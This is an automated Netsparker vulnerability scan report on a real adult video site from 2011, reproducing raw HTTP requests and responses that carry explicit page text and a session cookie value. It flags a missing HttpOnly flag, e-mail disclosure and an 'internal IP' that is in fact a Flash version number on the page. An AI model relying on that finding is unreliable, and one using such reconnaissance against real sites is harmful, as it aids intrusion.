Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html


Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /view_video.php

/view_video.php CONFIRMED

http://www.pornhub.com/view_video.php?viewkey=458626127

Identified Cookie

phub_in_player_security_key

Request

GET /view_video.php?viewkey=458626127 HTTP/1.1
Referer: http://www.pornhub.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Set-Cookie: phub_in_player_security_key=bf24c27075a8dd7d7b8b61b6c47bf7ee; expires=Sat, 02-Jul-2011 10:08:26 GMT; path=/; domain=.pornhub.com,phub_in_player=1; expires=Sat, 02-Jul-2011 10:08:26 GMT; path=/; domain=.pornhub.com
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 13599
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <link rel="canonical" href="http://www.pornhub.com/view_video.php?viewkey=458626127" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="Watch Vanessa Del Rio Nailed By Ron Jeremy - Pornhub.com. Pornhub is the ultimate xxx porn and sex site." /> <title>Vanessa Del Rio Nailed By Ron Jeremy - Pornhub.com</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/view_video.php?viewkey=458626127" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/view_video.php?viewkey=458626127" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/view_video.php?viewkey=458626127" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/view_video.php?viewkey=458626127" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/view_video.php?viewkey=458626127" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/view_video.php?viewkey=458626127" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/view_video.php?viewkey=458626127" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div class="section_wrapper">
<div class="section-top">
<p class="float-left large">
<a href="http://enter.brazzersnetwork.com/track/NDUxMDgxOjc6NDE/?action=join" target="_blank" rel="nofollow">DIDNT BLOW A LOAD? JOIN BRAZZERS FOR 1$ & YOU WILL</a></p>
<div class="reset"></div>
<div class="video-wrapper">
<div class="video-title-nf" style="height:35px;"><h1>Vanessa Del Rio Nailed By Ron Jeremy</h1></div>
<input type="hidden" id="video_1" value="1011203"/><div class="" id="playerDiv_1"> <div class="no-flash-js"> <p> WOOOOOOOO! Our player is taking to long to deliver the goodies. What's up with that? Well here is the thing: Computers aren't perfect and sometimes they play a number on people. This is what you can do: </p> <ul> <li>&nbsp;&nbsp;&nbsp;&nbsp;Wait just little longer (like a minute or two)</li> <li>&nbsp;&nbsp;&nbsp;&nbsp;Refresh the page (press 'F5' while holding down 'ctrl')</li> <li>&nbsp;&nbsp;&nbsp;&nbsp;If you have a wireless Linksys router... power it on-off for 10 about seconds</li> <li>&nbsp;&nbsp;&nbsp;&nbsp;Make sure Javascript is NOT turned off in your browser</li> <li>&nbsp;&nbsp;&nbsp;&nbsp;Get the latest <a href="http://get.adobe.com/flashplayer/">Flash player</a></li> </ul> </div></div><script type="text/javascript"> /* <![CDATA[ */ var to = new SWFObject("http://www.pornhub.com/cdn_files/flash/player_current.swf", "VideoPlayer", "608", "481", "9.0.0", "#000000"); to.addParam("allowfullscreen", "true"); to.addParam("allowScriptAccess", "always"); to.addParam("wmode", "opaque"); to.addVariable("autoplay","true"); to.addVariable("autoreplay","false"); to.addVariable("video_url","http%3A%2F%2Fchi-v56.pornhub.com%2Fdl%2F95115317af8407c4cfa365646195f0a0%2F4de7611a%2Fvideos%2F001%2F011%2F203%2F1011203.flv%3Fr%3D125%26b%3D600"); to.addVariable("postroll_url","http%3A%2F%2Fwww.pornhub.com%2Fcdn_files%2Fflash%2Fpost_roll%2Faff_postroll%2Faff_v3.swf"); to.addVariable("related_url","http%3A%2F%2Fwww.pornhub.com%2Fvideo_related.php%3Fid%3D1011203"); to.addVariable("link_url","http%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D458626127"); to.addVariable("video_title","Vanessa+Del+Rio+Nailed+By+Ron+Jeremy"); to.addVariable("embed_js","embed_click()"); to.addVariable("inplayer_url","http%3A%2F%2Fwww.pornhub.com%2Fcdn_files%2Fflash%2Finplayer.swf"); to.write("playerDiv_1"); /* ]]> */</script>
<div style="margin-top:8px;">
<iframe id="zone_67_site_2_2659318" name="zone_67_site_2_2659318" src="http://ads.trafficjunky.net/ads?zone_id=67&amp;site_id=2&amp;cache=1307009306" width="610" height="60" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></div> <div class="nf-sub_video">
<div class="left-video-box top-btn">

<div class="thumbs-container" id = "thumbs_up_video_1011203_thumbs_up">
<div class="buttons-img relative float-left" style="width:42px;">
<div class="globe-video-text display-none globe-thumb-up"><div>&nbsp;</div></div>
<a class="thumb thumb-up popap" type="globe-thumb-up" href="javascript:thumbs_up_video_1011203.rate(5)" title='I Like This'></a>
</div>
<div class="main-sprite bar-container">
<div class="bar-value" id = "thumbs_up_video_1011203_feedback"><strong>93%</strong><br /> (938 votes)</div>
<div class="green-bar" style="width:93%;"></div>
</div>
<div class="buttons-img relative float-right" style="width:42px;">
<div class="globe-video-text display-none globe-thumb-down"><div>&nbsp;</div></div>
<a class="thumb thumb-down popap" type="globe-thumb-down" href="javascript:thumbs_up_video_1011203.rate(0)" title='I Dislike This'></a>
</div>

</div>

<script type = "text/javascript">
var thumbs_up_video_1011203;

window.addEvent("domready", function(){
thumbs_up_video_1011203 = new ThumbsUp({
id: 1011203,
type: 'video',
submit_url: '/video/rate?id=1011203',
feedback_box: $('thumbs_up_video_1011203_feedback'),
rating: 4.64383,
num_ratings: 938,
object_name: 'thumbs_up_video_1011203'
});
});
</script>
</div>
<div class="right-video-box top-btn">
<div class="share share-tx">Share</div> <div class="buttons-img relative share"> <div class="globe-video-text display-none globe-twitter"><div>&nbsp;</div></div> <a class="btn-twitter addthis_button_twitter at300b popap" type="globe-twitter" title="Tweet This"></a> </div> <div class="buttons-img relative share"> <div class="globe-video-text display-none globe-face"><div>&nbsp;</div></div> <a class="btn-face addthis_button_reddit at300b popap" type="globe-face" title="Send to Reddit"></a> </div> <div class="buttons-img relative share"> <div class="globe-video-text display-none globe-stumble"><div>&nbsp;</div></div> <a class="btn-stumble addthis_button_stumbleupon at300b popap" type="globe-stumble" title="Send to StumbleUpon"></a> </div> <div class="buttons-img relative share"> <div class="globe-video-text display-none globe-live"><div>&nbsp;</div></div> <a class="btn-live addthis_button_live at300b popap" type="globe-live" title="Send to Live"></a> </div> <div class="buttons-img relative share"> <div class="globe-video-text display-none globe-star"><div>&nbsp;</div></div> <a class="btn-star addthis_button_favorites popap" type="globe-star" title="Save to Favorites"&g..
[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
- /front/flash10bug

/front/flash10bug

http://www.pornhub.com/front/flash10bug

Extracted IP Address(es)

10.1.102.64

Request

GET /front/flash10bug HTTP/1.1
Referer: http://www.pornhub.com/information
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:27:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5240
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Free Porn Videos &amp; Sex Movies - Porno, XXX, Porn Tube and Pussy Porn</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/front/flash10bug" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/front/flash10bug" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/front/flash10bug" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div class="section_wrapper" id="feedback">
<div class="section_bar">
<div class="section_title_lc png"></div>
<h4 class="section_title">How To Disable Flash Hardware Acceleration</h4>
<div class="section_title_rc png"></div>
<div class="videos_wrapper">
<p>
If you are experiencing either of the following problems:
<ul class="bullet">
<li>
<strong>Black Square</strong><br>
Users see a black square where the video player should be, this means the Flash file does not load properly.
</li>
<li>
<strong>Double video frame</strong><br>
Users see the video playing in double, with a green line splitting the player in half horizontally.
</li>
</ul>
<p>
These may be caused because you have updated your Flash recently and Adobe has been modifying how their Flash
player handles video playback (it may have automatically updated for you, or you told it to update when prompted)
you may be experiencing issues regarding video playback. Following the steps below should fix it for most
users. In order to resolve the problem, please turn off hardware acceleration of your Flash player. To do
so, please follow these very simple steps:
</p>
<ol>
<li>
Right click on any Flash animation on your browser.<br>
<strong>Please note:</strong> If you are having the "black square" problem, please try another Flash file!<br>
<img src="http://cdn1.static.pornhub.phncdn.com/images/flash10bug-1.png" />
</li>
<li>Next, click the "Settings..." line.</li>
<li>
The Flash settings dialog box should show up, as seen below:<br>
<img src="http://cdn1.static.pornhub.phncdn.com/images/flash10bug-2.png" />
</li>
<li>Uncheck the "Enable hardware acceleration" checkbox.</li>
<li>Click "Close".</li>
<li>Clear your cache, close your browser and try viewing our videos again.</li>
</ol>
</div>
</div>
<div class="section_bar">
<div class="section_title_lc png"></div>
<h4 class="section_title">How To Roll Back Your Flash Player To 10.1</h4>
<div class="section_title_rc png"></div>
<div class="videos_wrapper">
<p>
If disabling Flash Hardware Acceleration (above) doesn't resolve the problems for you, rolling back to 10.1
seems to be a workaround for now, at least on Windows machines. In the steps below, the download of version
10.1 has Mac files for the installer.
<br><br>
To fix this, roll back to version 10.1.102.64, using the following steps:
<br><br>
<strong>Uninstall the current Flash player:</strong>
</p>
<ol>
<li>Go here: <a href="http://kb2.adobe.com/cps/141/tn_14157.html">http://kb2.adobe.com/cps/141/tn_14157.html</a></li>
<li>Look for the uninstall_flash_player link and download it.</li>
<li>Close all browser windows.</li>
<li>Run the uninstaller.</li>
</ol>
<p style="font-weight:bold;">Install the previous version of the Flash player:</p>
<ol>
<li>Go here: <a href="http://kb2.adobe.com/cps/142/tn_14266.html">http://kb2.adobe.com/cps/142/tn_14266.html</a></li>
<li>Download version 10.1.102.64 .</li>
<li>Close all browser windows.</li>
<li>Unzip the files.</li>
<li>In the extracted folder, open the folder "Flash Player 10.1.102.64" .</li>
<li>Open the folder "10_1r102_64" .</li>
<li>For windows users, the file flashplayer10_1r1102_64_win.exe is the one you want. Double-click to
execute it and launch the installer.</li>
</ol>
<p>After installing version 10.1.102.64, videos should once again display properly.</p>
</div>
</div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. </p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information#btn-2257" rel="nofollow">2257</a> &middot; <a href="/webmasters" rel="nofollow">Webmasters</a> &middot; ..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /information

/information

http://www.pornhub.com/information

Found E-mails

Request

GET /information HTTP/1.1
Referer: http://www.pornhub.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 18732
Content-Type: text/html


